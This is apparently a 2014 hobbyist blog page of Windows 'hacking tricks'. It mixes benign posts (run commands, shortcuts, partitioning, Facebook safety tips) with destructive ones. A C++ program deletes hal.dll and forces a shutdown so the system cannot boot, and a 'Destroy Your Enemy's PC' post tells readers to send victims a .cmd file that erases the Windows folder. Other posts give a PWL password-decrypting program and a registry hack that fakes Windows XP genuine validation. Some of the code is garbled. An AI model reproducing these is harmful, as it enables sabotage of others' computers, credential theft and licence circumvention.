Saturday 31 May 2014

 TO DELETE THE HAL.DLL FILE

Posted By: Abhishek Anand



This is a powerful C++ program, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.This is not a prank..

Warning: Do not try this on your home computer.

Code:

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
    system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
    system("PAUSE");
    return EXIT_SUCCESS;
}

Note:
          The "del" command is used in DOS to delete stuff. "-q" is a parameter which means force delete,or delete without asking.shutdown -s -f -t 00 means shutdown,force close everything running,in 00 seconds time.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ADD TEXT TO AN IMAGE>>>>>>>>>>>

Posted By: Abhishek Anand



Put some txt in an image.

CODING:

#include <stdio.h>
#include <gd.h>
#include <gdfontg.h>

int main(int argc, char *argv[]) {
 gdImagePtr img;
 FILE *fp = {0};
 int width, white, black;

 width = white = black = 0;

 if(argc != 3) {
  fprintf(stderr, "Usage: pngtxt image.png 'Hello world.. !'\n");
  return 1;
 }

 fp = fopen(argv[1], "wb");
 if(fp == NULL) {
  fprintf(stderr, "Error - fopen(%s)\n", argv[1]);
  return 1;
 }

 width = strlen(argv[2]);

 img = gdImageCreate(width * 10, 20);

 white = gdImageColorAllocate(img, 255, 255, 255);
 black = gdImageColorAllocate(img, 0, 0, 0);

 gdImageString(img, gdFontGiant, 2, 1, argv[2], black);

 gdImagePng(img, fp);

 fclose(fp);
 gdImageDestroy(img);

 return 0;
}

 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
FOLDER LOCK SOURCE CODE>>>>.

Posted By: Abhishek Anand



#include<process.h>
#include<iostream.h>
#include<fstream.h>
#include<conio.h>
void print();
void choice();
void main()
{
clrscr();
print();
cout<<”nnnnnnnn -Before proceeding read carefully the
readme.txt file.”;
cout<<”nn -On execution it will create files namely lock.bat &
unlock.bat.”;
cout<<”nnnnnnnnnnnnnnnttttTHANK YOU”;
cout<<”nnnnnnnnnnntttttttpress any key …”;
getch();
clrscr();
char pass[6];
print();
cout<<”nn Enter secret code :”;
abc:for(int i=1;i<=6;i++)
{
pass[i]=getch();
cout<<”*”;
}
getch();
for(i=1;i<=6;i++)
{
if(pass[1]==’R’ && pass[2]==’i’ && pass[3]==’t’ && pass[4]==’e’
&& pass[5]==’s’ && pass[6]==’H')
{
clrscr();
char fold_name[20],ch;
print();
cout<<”nnn Enter the name of the folder you want to protect :
“;
cin.getline(fold_name,20);
char kk;
clrscr();
asd:print();
cout<<”nnn What do you want to do?”;
cout<<”nnnta> Lock Folder”;
cout<<”nntb> Unlock Folder”;
cout<<”nntc> Exit”;
cout<<”nnnnnn Enter your choice : “;
cin>>kk;
switch(kk)
{
case ‘a’:
case ‘A’:
{
qwe:clrscr();
print();
cout<<”nn In which special folder you want to convert your
folder:”;
choice();
cin>>ch;
switch(ch)
{
case ’1′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{00022602-
0000-0000-C000-000000000046}ndel lock.bat”;
file.close();
} break;
case ’2′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{0CD7A5C0-
9F37-11CE-AE65-08002B2E1262}ndel lock.bat”;
file.close();
} break;
case ’3′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{0DF44EAAFF21-
4412-828E-260A8728E7F1}ndel lock.bat”;
file.close();
} break;
case ’4′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{208D2C60-
3AEA-1069-A2D7-08002B30309D}ndel lock.bat”;
file.close();
} break;
case ’5′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{20D04FE0-
3AEA-1069-A2D8-08002B30309D}ndel lock.bat”;
file.close();
} break;
case ’6′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{645FF040-
5081-101B-9F08-00AA002F954E}ndel lock.bat”;
file.close();
} break;
case ’7′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{6DFD7C5C-
2451-11d3-A299-00C04F8EF6AF}ndel lock.bat”;
file.close();
} break;
case ’8′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{7007ACC7-
3202-11D1-AAD2-00805FC1270E}ndel lock.bat”;
file.close();
} break;
default :
{
cout<<”nn Invalid Choice”;
cout<<”nnnnnnntttttttpress any key …”;
getch();
clrscr();
goto qwe;
}
}//ch
}break;//case1
case ‘b’:
case ‘B’:
{
char ufold_name[20],ch1;
dfg:clrscr();
print();
cout<<”nn In which special folder you have converted your
folder:”;
choice();
cin>>ch1;
switch(ch1)
{
case ’1′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{00022602-0000-0000-C000-
000000000046}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’2′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{0CD7A5C0-9F37-11CE-AE65-
08002B2E1262}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’3′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{0DF44EAA-FF21-4412-828E-
260A8728E7F1}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’4′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{208D2C60-3AEA-1069-A2D7-
08002B30309D}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’5′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{20D04FE0-3AEA-1069-A2D8-
08002B30309D}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’6′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{645FF040-5081-101B-9F08-
00AA002F954E}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’7′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{6DFD7C5C-2451-11d3-A299-
00C04F8EF6AF}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’8′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{7007ACC7-3202-11D1-AAD2-
00805FC1270E}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
default :
{
cout<<”nn Invalid Choice”;
cout<<”nnnnnnntttttttpress any key …”;
getch();
clrscr();
goto dfg;
}
}//ch
}//case2
case ‘c’:
case ‘C’:
{
exit(0);
}
default :
{
cout<<”nn Invalid Choice”;
cout<<”nnnnnnnnnnntttttttpress any key …”;
getch();
clrscr();
goto asd;
}
}//switchkk
break;}//if
else
{
cout<<”ann Renter secret code :”;
goto abc;
}
}//for
}//main
void print()
{
cout<<”n********************************************************
************************”;
textcolor(RED);
cprintf(“n WEB KING HACKER”);
cprintf(“nn
Developed by: RAJESH KUMAR”);
textcolor(WHITE);
cout<<”nn******************************************************
**************************”;
}
void choice()
{
cout<<”nnnnt1> Media Clip”;//{00022602-0000-0000-C000-
000000000046}
cout<<”nnt2> Cabinet File”; //{0CD7A5C0-9F37-11CE-AE65-
08002B2E1262}
cout<<”nnt3> Taskbar And Start Menu”;//{0DF44EAA-FF21-4412-828E-
260A8728E7F1}
cout<<”nnt4> My Network Places”;//{208D2C60-3AEA-1069-A2D7-
08002B30309D}
cout<<”nnt5> My Computer”; //{20D04FE0-3AEA-1069-A2D8-
08002B30309D}
cout<<”nnt6> Recycle Bin”; //{645FF040-5081-101B-9F08-
00AA002F954E}
cout<<”nnt7> Folder Option”; //{6DFD7C5C-2451-11d3-A299-
00C04F8EF6AF}
cout<<”nnt8> Network Connection”;//{7007ACC7-3202-11D1-AAD2-
00805FC1270E}
cout<<”nnnnnn Enter Your choice : “;
}

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RUN COMMANDS FOR WINDOWS>>>>>>>

Posted By: Abhishek Anand



CONTROL COMMANDS

* CONTROL: opens the control panel window
* CONTROL ADMINTOOLS: opens the administrative tools
* CONTROL KEYBOARD: opens keyboard properties
* CONTROL COLOUR: opens display properties.Appearance tab
* CONTROL FOLDERS: opens folder options
* CONTROL FONTS: opens font policy management
* CONTROL INTERNATIONAL or INTL.CPL: opens Regional and Language option
* CONTROL MOUSE or MAIN.CPL: opens mouse properties
* CONTROL USERPASSWORDS: opens User Accounts editor
* CONTROL USERPASSWORDS2 or NETPLWIZ: User account access restrictions
* CONTROL PRINTERS: opens faxes and printers available
* APPWIZ.CPL: opens Add or Remove programs utility tool
* OPTIONALFEATURES: opens Add or Remove Windows component utility
* DESK.CPL: opens display properties. Themes tab
* HDWWIZ.CPL: opens add hardware wizard
* IRPROPS.CPL: infrared utility tool
* JOY.CP: opens game controllers settings
* MMSYS.CPL: opens Sound and Audio device Properties. Volume tab
* SYSDM.CPL: opens System properties
* TELEPHON.CPL: Opens phone and Modem options
* TIMEDATE.CPL: Date and Time properties
* WSCUI.CPL: opens Windows Security Center
* ACCESS.CPL: opens Accessibility Options
* WUAUCPL.CPL: opens Automatic Updates
* POWERCFG.CPL: opens Power Options Properties
* AZMAN.MSC: opens authorisation management utility tool
* CERTMGR.MSC: opens certificate management tool
* COMPMGMT.MSC: opens the Computer management tool
* COMEXP.MSC or DCOMCNFG: opens the Computer Services management tool
* DEVMGMT.MSC: opens Device Manager
* EVENTVWR or EVENTVWR.MSC: opens Event Viewer
* FSMGMT.MSC: opens Shared Folders
* NAPCLCFG.MSC: NAP Client configuration utility tool
* SERVICES.MSC: opens Service manager
* TASKSCHD.MSC or CONTROL SCHEDTASKS: opens Schedule Tasks manager
* GPEDIT.MSC: opens Group Policy utility tool
* LUSRMGR.MSC: opens Local Users and Groups
* SECPOL.MSC: opens local security settings
* CIADV.MSC: opens indexing service
* NTMSMGR.MSC: removable storage manager
* NTMSOPRQ.MSC: removable storage operator requests
* WMIMGMT.MSC: opens (WMI) Window Management Instrumentation
* PERFMON or PERFMON.MSC: opens the Performance monitor
* MMC: opens empty Console
* MDSCHED: opens memory diagnostics tools
* DXDIAG: opens DirectX diagnostics tools
* ODBCAD32: opens ODBC Data source Administrator
* REGEDIT or REGEDT32: opens Registry Editor
* DRWTSN32: opens Dr. Watson
* VERIFIER: opens Driver Verifier Manager
* CLICONFG: opens SQL Server Client Network Utility
* UTILMAN: opens Utility Manager
* COLORCPL: opens color management
* CREDWIZ: back up and recovery tool for user passwords
* MOBSYNC: opens Synchronization center
* MSCONFIG: opens System Configuration Utility
* SYSEDIT: opens System Configuration Editor (careful while using this command)
* SYSKEY: Windows Account Database Security management (careful while using this command)

Windows utility and applications

* EPLORER: Opens windows Explorer
* IEXPLORER: Opens Internet explorer
* WAB: opens Contacts
* CHARMAP: opens Character Map
* WRITE: opens WordPad
* NOTEPAD: opens Notepad
* CALC: opens Calculator
* CLIPBRD: opens Clipboard Viewer-> Vista Has no ClipBoard..
* WINCHAT: opens Microsoft Chat Interface
* SOUNDRECORDER: opens sound recording tool
* DVDPLAY: run CD or DVD
* WMPLAYER: opens Windows Media Player
* MOVIEMK: Opens untitled Windows Movie Maker
* OSK: opens on-screen Keyboard
* MAGNIFY: opens Magnifier
* WINCAL: opens Calendar
* DIALER: opens phone Dialer
* EUDCEDIT: opens Private Character Editor
* NDVOL: opens the mixer volume
* RSTRUI : opens Tool System Restore (For Vista only)
* %WINDIR%\SYSTEM32\RESTORE\rstrui.exe: opens Tool System Restore (for XP only).
* MSINFO32: Opens the System Information
* MRT : launches the utility removal of malware.
* Taskmgr : Opens the Windows Task Manager
* CMD: opens a command prompt
* MIGWIZ: Opens the tool for transferring files and settings from Windows (Vista only)
* Migwiz.exe: Opens the tool for transferring files and settings from Windows (for XP only)
* SIDEBAR: Open the Windows (Vista only)
* Sigverif : Opens the tool for verification of signatures of files
* Winver : Opens the window for your Windows version
* FSQUIRT: Bluetooth Transfer Wizard
* IExpress opens the wizard for creating self-extracting archives. Tutorial HERE
* MBLCTR: opens the mobility center (Windows Vista only)
* MSRA : Opens the Windows Remote Assistance
* Mstsc : opens the tool connection Remote Desktop
* MSDT: opens the diagnostic tools and support Microsoft
* WERCON: opens the reporting tool and solutions to problems (for Vista only)
* WINDOWSANYTIMEUPGRADE: Enables the upgrade of Windows Vista
* WINWORD : opens Word (if installed)
* PRINTBRMUI : Opens migration wizard printer (Vista only)


Disk management
* DISKMGMT.MSC: opens disk management utility
* CLEANMGR: opens disk drive clean up utility
* DFRG.MSC: opens disk defragmenter
* CHKDSK: complete analysis of disk partition
* DISKPART: disk partitioning tool


Connection management

* IPCONFIG: list the configuration of IP addresses on your PC (for more information type IPCONFIG/? in the CMD menu)
* INETCPL.CPL: opens internet properties
* FIREWALL.CPL: opens windows firewall
* NETSETUP.CPL: opens network setup wizard


Miscellaneous commands

* JAVAWS: View the cover of JAVA software (if installed)
* AC3FILTER.CPL: Opens the properties AC3 Filter (if installed)
* FIREFOX: Mozilla launches Firefox (if installed)
* NETPROJ: allow or not connecting to a network projector (For Vista only)
* LOGOFF: closes the current session
* SHUTDOWN: shut down Windows
* SHUTDOWN-A: to interrupt Windows shutdown
* %WINDIR% or %SYSTEMROOT%: opens the Windows installation
* %PROGRAMFILES%: Opens the folder where you installed other programs (Program Files)
* %USERPROFILE%: opens the profile of the user currently logged
* %HOMEDRIVE%: opens the browser on the partition or the operating system is installed
* %HOMEPATH%: opens the currently logged user C: \ Documents and Settings \ [username]
* %TEMP%: opens the temporary folder
* VSP1CLN: deletes the cache for installation of the service pack 1 for Vista
PLAY YOUTUBE VIDEOS IN THE WEBSITE>>

Posted By: Abhishek Anand

src="http://www.youtube.com/urlink"
type="application/x-shockwave-flash">


eg:

 <html>
<body>

<embed
width="420" height="345"
src="http://www.youtube.com/urlink"
type="application/x-shockwave-flash">
</embed>

</body>
</html>
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
CRACK WINDOWS PASSWORD SOURCE CODE!!!
Posted By: Abhishek Anand 

:    This will reveal your windows computer password. Just copy this code on to a notepad.
Save it as anything.c. Remember to change the file type to "All file".



# include<stdio.h>
 # include<stdio.h>
 # include<process.h>
 # include<stdlib.h>
 # include<ctype.h>
 # include<conio.h>
 # include<mem.h>

 unsigned char huge Data[100001];
 unsigned char keystream[1001];
 int Rpoint[300];

 void main(int argc,char *argv[]){
 FILE *fd;
 int i,j;
 int size;
 char ch;
 char *name;
 int cracked;
 int sizemask;
 int maxr;
 int rsz;
 int pos;
 int Rall[300];     /* Resourse allocation table */

 if(argc<2)
 {
     printf("usage: glide filename (username)");
     exit(1);
 }
 /* Read PWL file */

 fd=fopen(argv[1],"rb");
 if(fd==NULL)
 {
       printf("can't open file %s",argv[1]);
       exit(1);
 }
 size=0;
 while(!feof(fd)){
         Data[size++]=fgetc(fd);
 }
 size--;
 fclose(fd);

 /* Find Username */
 name=argv[1];
 if(argc>2)name=argv[2];
 printf("Username:%s",name);

 /* Copy encrypted text into keystream */
 cracked=size-0x0208;
 if(cracked<0)cracked=0;
       if(cracked>1000)cracked=1000;
                memcpy(keystream,Data+0x208,cracked);

 /* Generate 20 bytes of keystream */
 for(i=0;i<20;i++)
 {
     ch=toupper(name[i]);
     if(ch==0)break;
     if(ch=='.')break;
     keystream[i]^=ch;
 };
 cracked=20;

 /* Find allocated resources */
 sizemask=keystream[0]+(keystream[1]<<8);
 printf("Sizemask:%04X",sizemask);
 for(i=0;i<256;i++)
 {
     if(Data[i]!=0xff)
         {
         Rall[Data[i]]++;
         if(Data[i]>maxr)
                             maxr=Data[i];
     }
 }

 maxr=(((maxr/16)+1)*16); /* Resourse pointer table size appears to be
 divisible by 16 */

 /*Search after resources */

 Rpoint[0]=0x0208+2*maxr+20+2; /* First resources */
 for(i=0;i<maxr;i++)
 {
     /* Find the size of current resourse */
     pos=Rpoint[i];
     rsz=Data[pos]+(Data[pos+1]<<8);
     rsz^=sizemask;
     printf("Analysing block with size:%04x    (%d:%d)",rsz,i,Rall[i]);
     if((Rall[i]==0)&&(rsz!=0))
          {

         printf("Unused resourse has nonzero size!!!");
         printf("If last line produed any:U may try 2 recover");
         printf("Press y to attempt the recovery");
         ch=getch();
         if(ch!='y')exit(0);
         rsz=2;
         i=i-1;
     }
     pos=pos+rsz;
 /* Resourse have a tedency to have the wrong size for some reason*/
     /* Chech for correct size*/
     if(i<maxr-1)
         {
         while(Data[pos+3]!=keystream[1])
                 {
             printf(":",Data[pos+3]);
             pos=pos+2; /* Very rude may fail */
         }
     }
     pos+=2; /* Include pointer in size */
     Rpoint[i+1]=pos;
 }

 Rpoint[maxr]=size;
 /* Insert Table data into keystream*/
 for(i=0;i<=maxr;i++)
 {
     keystream[20+2*i]^=Rpoint[i] & 0x00ff;
     keystream[21+2*i]^=(Rpoint[i]>>8) & 0x00ff;
 }
 cracked+=maxr*2+2;
 printf("%d Bytes of ketstream recoverd ",cracked);
 /* Decrypt resources */
 for(i=0;i<maxr;i++)
 {
     rsz=Rpoint[i+1]-Rpoint[i];
         if(rsz>cracked)
         rsz=cracked;
             printf("Resource[%d](%d)",i,rsz);
     for(j=0;j<rsz;j++)                                    
             printf("%c",Data[Rpoint[i]+j]^keystream[j]);
           printf("");
 }
     exit(0);
 }  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 FACEBOOK ACCEPT OR REJECT AT ONE TIME!!!!

Posted By: Abhishek Anand

  *If You Get A Lot Of Friend Requests Daily Or You Opened You Facebook Account After A Long Time, You Could End Up Having To Manually Accept Or Reject All Of Them, these code can be used to accept or reject all of them at once.

 PROCESS>>>

 Copy The Following Code:

For Accepting:

javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);

For Rejecting:

javascript:for( i = 1;i<document.getElementsByName("actions[hide]").length;i++){document.getElementsByName("actions[hide]")[i].click();}void(0);

    Paste This Code In The Address Bar Of The Page You Opened In The First Step

    Now Just Wait And Let The Script Work!!


Note: For Chrome Users: When You Paste The Code In The Address Bar, You Will Manually Need To Reinsert "javascript:" in Front Of It
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Partition a Drive Without Losing Data!!!!

Posted By: Abhishek Anand

Wishes to partition your hard drives? But, partitioning a drive in windows will needed us toformat the drive. In this tutorial, I will teach you how to partition a drive without need to backup your data and format your drives. You might wonder if this trick need you  to downloadsome softwares or tools. Do not worry because this trick is 100% download-free. We just gonna use a built in windows tool.

This trick had been tested on Windows7 and Vista. I'm not sure that this trick will work onwindows XP. This trick allows you to partition any drive including system drives.

Okay, first of all open Run dialog box ( Start > Run ). Type in "diskmgmt.msc" without the quotes in the text box. Wait until Disk Management window pop up. It may take a few seconds to load. After it’s fully loaded, go to Storage > Disk management at the left sidebar. Now you could see a list of storage devices that are currently connected to your computer. Now choosethe drive that you want to partition. Right Click on it and select "Shrink Volume" option from menu.


The system will search for available space in your selected disk volume. A window will pop up asking you to wait while it loads. This will not take much longer than few seconds. Next the Shrink dialog box will pop-up. This is where you’ll have to specify the volume for next partition. Look at the total size of available shrink space. Below it, you’ll have to enter the space to shrink.


To make sure that you not losing any data, shrink size is not below the total size of space taken by files in that drive. You can check the used space by right clicking on the drive you are going to partition and choose "Properties" from the menu.


After done shrinking your drive. You can see an unallocated space in your shrunk drive. But you’ll still not able to access this new drive. You’ll have to format it and specify the drive letter to access them. Right click on unallocated drive and choose "New Simple Volume" option.


New Simple Volume Wizard Window will pop up. Click on "Next" button to continue. In next window, you’ll have to specify the size for your new volume. Set full size if you are satisfied with two partitions or you can divide it again for new partition. Next, choose any drive letter from the available list and click on "Next" button. In next window, leave everything as default but make sure it's similar to the screen below ( If you want to change the volume label, feel free to do it ).


Click on Finish window to complete the wizard. Go to My Computer and you can see your new drive. That is all. Hope this tutorial will help you. Enjoy.
---Trick to enable/diable "Task manager"---
Posted By: Abhishek Anand

* Click Start
* Click Run
* Enter gpedit.msc in the Open box and click OK
* In the Group Policy settings window
o Select User Configuration
o Select Administrative Templates
o Select System
o Select Ctrl+Alt+Delete options
o Select Remove Task Manager
o Double-click the Remove Task Manager option

since the policy is Remove Task Manager, by disabling the policy, you are enabling the Task Manager.
Microsoft ShortCut Keys
Keyboard Shortcuts

Posted By: Abhishek Anand
           
Ctrl + A      Select all (including text, graphics).

Ctrl + B      Bold.

Ctrl + I      Italic.

Ctrl + U      Underline.

Ctrl + C      Copy.

Ctrl + V      Paste.

Ctrl + X      Cut.

Ctrl + F      Find.

Ctrl + Z      Undo.

Ctrl + K      Insert link.

Ctrl + L      Left align.

Ctrl + E      Center align.

Ctrl + R      Right align.

Ctrl + M      Indent.

Ctrl + (left arrow)     Moves one word to the left.

Ctrl + (right arrow)     Moves one word to the right.

Ctrl + (up arrow)     Moves cursor to the beginning of the paragraph.

Ctrl + (down arrow)     Moves cursor to the end of the paragraph.

Ctrl + Shift + F     Change font.

Ctrl + Shift + *     View/hide non-printing characters.

Ctrl + Del     Deletes word to the right of cursor.

Ctrl + Backspace     Deletes word to the left of cursor.

Ctrl + End     Moves cursor to the end of document.

Ctrl + Home     Moves cursor to the beginning of document.

Ctrl + Spacebar     Reset highlighted text to the default font.

Ctrl + 1     Single-space.

Ctrl + 2     Double-space.

Ctrl + 5     1.5-line.

Ctrl + Alt + 1     Format text: heading 1.

Ctrl + Alt + 2     Format text: heading 2.

Ctrl + Alt + 3     Format text: heading 3.

F1     Help.

F4     Repeat the last action

F5     Go to .

F7     Spelling and grammar.

F12     Save as.

F8 then (left arrow)     Increase selection to the left by one character

F8 then (right arrow)     Increase selection to the right by one character

Ctrl + F1     Task Pane.

Ctrl + F2     Print preview.

Alt + Ctrl + F2     New document.

Shift + F3     Cycle between capitalized formats

Ctrl + Insert     Copy.

Shift + Insert     Paste.

Shift + End     Select from current position to the end of the line.

Shift + Home     Select from current position to the beginning of the line.

Ctrl + Shift + (left arrow)     Select from current position to the beginning of the word.

Ctrl + Shift + (right arrow)     Select from current position to the end of the word.

Ctrl + Shift + (up arrow)     Select from current position to the beginning of the document.

Ctrl + Shift + (down arrow)     Select from current position to the end of the document.

Ctrl + Shift + Page Up     Select from current position to the beginning of the window.

Ctrl + Shift + Page Down     Select from current position to the end of the window.

Shift + Page Up     One screen page up.

Shift + Page Down     One screen page down.

Shift + F7     Thesaurus check selected text.

Shift + F12     Save.

Ctrl + Shift + F12     Print.

Alt + Shift + D     Insert the current date.

Alt + Shift + T     Insert the current time.


Enjoy and Share Click to add text, images, and other content

Top 25 Application Secrets in Windows XP
There are some hidden secrets inside the application
window XP and sometimes we do not know ...
the following list is a list of confidential applications are:

Posted By: Abhishek Anand


To run the applications below:[/color]
Open a command prompt and Type the name of the program (example:
cleanmgr.exe)
or click Start -> Run and Type in the name of the program (example: cleanmgr.exe).


1. Disk Cleanup = cleanmgr.exe
Used to cleanup disk

2. Character Map = charmap.exe
Used to search for unusual characters

3. Dr Watson = drwtsn32.exe
Used for troubleshooting on the PC.

4. DirectX diagnosis = dxdiag.exe
Used for diagnosis audio video card

5. Private character editor = eudcedit.exe
Used to create a new character in your windows

6. IExpress Wizard = iexpress.exe
Used to create self-extracting / self-installing package. such as a Zip file

7. MICR * Synchronization Manager = mobsync.exe soft
Used to make sincronisasi.

8. Clipboard Viewer = clipbrd.exe
Used to view the content of the Windows clipboard

9. Windows Media Player 5.1 = mplay32.exe
Used to open Windows Media Player version 5.1

10. ODBC Data Source Administrator = odbcad32.exe
Used for database

11. Object Packager = packager.exe
Used to insert an object into a file.

12. System Configuration Editor = sysedit.exe
Used to change the system.ini and win.ini

13. Syskey = syskey.exe
Used to configure an account on the windows.

14. MICR * soft Telnet Client = telnet.exe
Used to connect to the Internet before there was a browser.

15. Driver Verifier Manager = verifier.exe
Used for monitoring drivers in your windows

16. Windows for Workgroups Chat = winchat.exe
Used to chat sec

17. System configuration = msconfig.exe
Used to control startup programs

18. System Monitor = perfmon.exe
Used to monitor your PC.

19. Program Manager = progman.exe
Is inherited from Windows 3.x desktop shell

20. gpedit.msc
Used to set the group policy and authorization, if you use Active Directory.

21. Remote Access phone book = rasphone.exe
It is applications like phone book

22. Registry Editor = Regedt32.exe [also regedit.exe]
Used for tweaking and editing windows registry

23. Network shared folder wizard = shrpubw.exe
Used to create a shared network folder

24. Siganture file verification tool = sigverif.exe
Used to verify signatures

25. Volume Control = sndvol32.exe
Used to display the sound control in the System Tray
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Make your WINDOWS XP Genuine Without any Software!
Posted By: Abhishek Anand

OPEN NOTEPAD AND WRITE THIS:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd

"LastWPAEventLogged"=hex:d5,07,05,00,06,00,07,00,0f,00,38,00,24,00,fd,02
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"InstallDate"=dword:427cdd95
"ProductId"="69831-640-1780577-45389"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,36,39,38,33,31,2d,36,34,30,2d,\
31,37,38,30,35,37,37,2d,34,35,33,38,39,00,5a,00,00,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,00,0d,04,89,b2,15,1b,c4,ee,62,4f,e6,64,6f,01,00,\
00,00,00,00,27,ed,85,43,a2,20,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,31,34,35,30,34,00,00,00,00,00,00,00,ce,0e,\
00,00,12,42,15,a0,00,08,00,00,87,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,94,a2,b3,ac
"LicenseInfo"=hex:9e,bf,09,d0,3a,76,a5,27,bb,f2,da,88,58,ce,58,e9,05,6b,0b,82,\
c3,74,ab,42,0d,fb,ee,c3,ea,57,d0,9d,67,a5,3d,6e,42,0d,60,c0,1a,70,24,46,16,\
0a,0a,ce,0d,b8,27,4a,46,53,f3,17

NOW SAVE AS WINDOWS.REG AS FILE NAME OPEN THAT,,AND I GUARANTEE U THAT UR ALL VALIDATION HAVE BEEN FIXED WITHIN A SECOND,,NOW U HAVE GENUINE WINDOWS.\
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Destroy Your Enemy's PC...!!!
Posted By: Abhishek Anand

Open your notepad and type the following………

del c:\boot?ini c:\del autoexec.bat

Now Save as anyname.exe. Create this in C: drive

The only thing you need is Notepad.

1. Create a text file called TEST.txt(empty) in C:\

2. Now in your notepad type “erase C:\TEST.txt” (without the quotes). Then save it as “Test.cmd”.

3. Now run the file “Test.cmd”go to C:\ and you’ll see your Test.txt is gone.

Now, the real work (don't try this on your personal computer)

1. Go to Notepad and type erase C:\WINDOWS and save it as findoutaname.cmd.

2. Now DON’T Run the file or you’ll lose your WINDOWS map.

So, that’s the Virus. In this way you can make a virus to delete any file you want.

Now to take revenge. Send you file to your victim. Once victim opens it. WINDOWS map is Deleted. And he will have to install WINDOWS again.

Beware: Its simple but a strong virus that can delete anyones Windows OS …

Note: I am not Taking any Responsibilties if by this you damage your windows.

hope you enjoyed this article!!!!!!!!!
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

How to protect Facebook account from being hacked?
Posted By: Abhishek Anand 
Hacking of Facebook Account

#1. Its very easy to hack a Facebook account, If you are ignorant about the page URL. Many pishers around the Web create a page which will exactly look like the Facebook login page. If you login using that page, Your account will be in the hands of some Tom, Dick or Harry. So always check the URL of the page before logging in.

Facebook Login Page 550x149 How to Prevent Hacking of Facebook Account

#2. Visiting Links which are shared by your Friends. This would be also a cause of Hacking of Facebook account. So, Double check when you are visiting a link shared by your friends. If you think its a good clean link, then proceed.
Links on Facebook How to Prevent Hacking of Facebook Account
#3. Do you think, Your Facebook account is being accessed by anyone? Get Notified when your Facebook account is logged in from a different place.
How to do this?
1. Login to your Facebook account, Click on Account and navigate to Account Settings.
2. Under Account Security, Check Send me an email, If a new computer or mobile device logs into this account. You can also Check Send me a text message, If you have added a mobile device.
Account Security on Facebook 550x206 How to Prevent Hacking of Facebook Account

    Additional Tip: Also enable HTTPS secure browsing.

HTTPS on Facebook How to Prevent Hacking of Facebook Account
#4. Avoid using Spam Applications. Don’t try to use an application which you don’t know or seen some of your friends using. To View/Edit applications which you are using, Go to Applications Settings page.

    Additional Tip: Remove Applications which you are not using now.

Account Security on Facebook 550x206 How to Prevent Hacking of Facebook Account
#5. Always use a complex and very strong Password. A combination of Alphabets, Numbers and Special Characters is an unbeatable or unguessable password. Avoid using your Name, Girl Friends name, Your Mobile number etc., in your password as these are easily guessable.

#6. Don’t accept requests from the people you don’t know. Avoid adding people you don’t know to your friends list. If he/she is a Mutual Friend then you can add.

#7. Regularly scan your Computer with some Anti-Spyware or Anti-Malware tools. Some of the recommended tools are Panda Active Scan, Trend Micro Housecall

Thus these are the 7 Basic as well as Best possible ways for preventing and stopping the Hacking of Facebook Account.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
CMD TRICKS
Posted By: Abhishek Anand

How to do calculations on Command Prompt ?
